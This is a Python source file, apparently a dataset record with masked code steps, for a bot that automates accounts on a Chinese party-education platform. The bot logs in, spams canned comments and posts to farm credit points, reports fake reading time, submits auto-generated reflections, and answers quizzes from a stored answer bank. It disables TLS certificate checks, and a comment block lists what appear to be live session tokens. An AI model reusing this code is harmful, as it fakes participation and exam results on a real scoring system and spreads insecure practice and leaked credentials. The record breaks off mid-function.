temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {
'token': self.token,
'appid': self.appid,
'paper': paper,
'answers': json.dumps(answers),
# 'answers': [{'answer': 'A', 'index': '639'}, {'answer': 'A', 'index': '639'}],
}
# print('hdata:', hdata)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl,
data=hdata,
verify=False).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
def getAnswerInfo(self):
'''
获得答题的结果与正确率
:return:
'''
data = {
'token': self.token,
'appid': self.appid,
'page_size': '20',
'page_index': 'page_index',
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
print(rjson)
'''
https://mapi.dangjianwang.com/v3_1/exam/randexam 答题地址 主id是交卷的paper 这里要获取到questions里的id 等于回答问题中的index
appid TJZHDJ01
bank 6
token 5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_
https://mapi.dangjianwang.com/v3_1/exam/handpaper 交卷的连接
appid TJZHDJ01
answers [{"index":"635","answer":"D"},{"index":"640","answer":"C"},{"index":"641","answer":"B"},{"index":"665","answer":"B"},{"index":"670","answer":"B"},{"index":"673","answer":"B"},{"index":"677","answer":"C"},{"index":"682","answer":"B"},{"index":"684","answer":"C"},{"index":"690","answer":"A"}]
token 5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_
paper 4565894
https://mapi.dangjianwang.com/v3_1/exam/banklist 获得答题情况的连接
appid TJZHDJ01
page_size 20
token 5jTY47PbPZxXeRxlkzScAPWidyvssy3TBD5Y9UYiCQnMmCfa2pRNb1JCDwq_
page_index 1
--------------------------------------------------
https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList 学习的id列表
appid TJZHDJ01
page_size 20
type_id 791
token 5jTY47PbPZJbeh9ixjfOUvaoI3604SrSAz5Zokt3DAmfz3qIis4Yb1JCDwq_
page_index 1
下面是针对791id列表中的访问地址
https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus
post1:
appid TJZHDJ01
mid 9729
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
post2:
https://mapi.dangjianwang.com/v3_1/Login/CheckToken
appid TJZHDJ01
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
post3:
https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum
appid TJZHDJ01
mid 9729
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
get1 https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={} 获得页面
post 发表体会
https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling
appid TJZHDJ01
content 伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。
mid 9729
token 5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_
post 结束学习
https://mapi.dangjianwang.com/v3_1/Study/ReadTime
appid TJZHDJ01
time 362
mid 9729
token 5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_
---------------------------------------
https://mapi.dangjianwang.com/v3_1/Help/List 这里获得帮助id
https://mapi.dangjianwang.com/v3_1/Help/PostComment 提交评论的地址
appid TJZHDJ01
content 不忘初心,牢记使命!
id 55984
token 5jTY47PbPcpZe0s1xDLKAqKoIimx6SnSVjcApB92DF3Nmy/djZ1Nb1JCDwq_
把党的政治建设摆在首位!
不忘初心,牢记使命!
-------------------------------
发布的内容
https://mapi.dangjianwang.com/v3_1/Viewpoint/Create
appid TJZHDJ01
content 不忘初心牢记使命
token 5jTY47PbPZ9deR5rkTXIB/b/fymw5HvbAj9R900gDArNnXqE1s9Kb1JCDwq_
不忘初心,牢记使命,坚持终身学习!
全面的小康,覆盖的人口要全面,是惠及全体人民的小康。
-----------------------------
点赞错误
{'msg': '重复评论过多,请您修改后重新提交。', 'code': '500'}
'''
|
flexible
|
{
"blob_id": "55a26eb2625acb201677f5ff50fde809402c9b93",
"index": 2630,
"step-1": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n <mask token>\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n <mask token>\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = 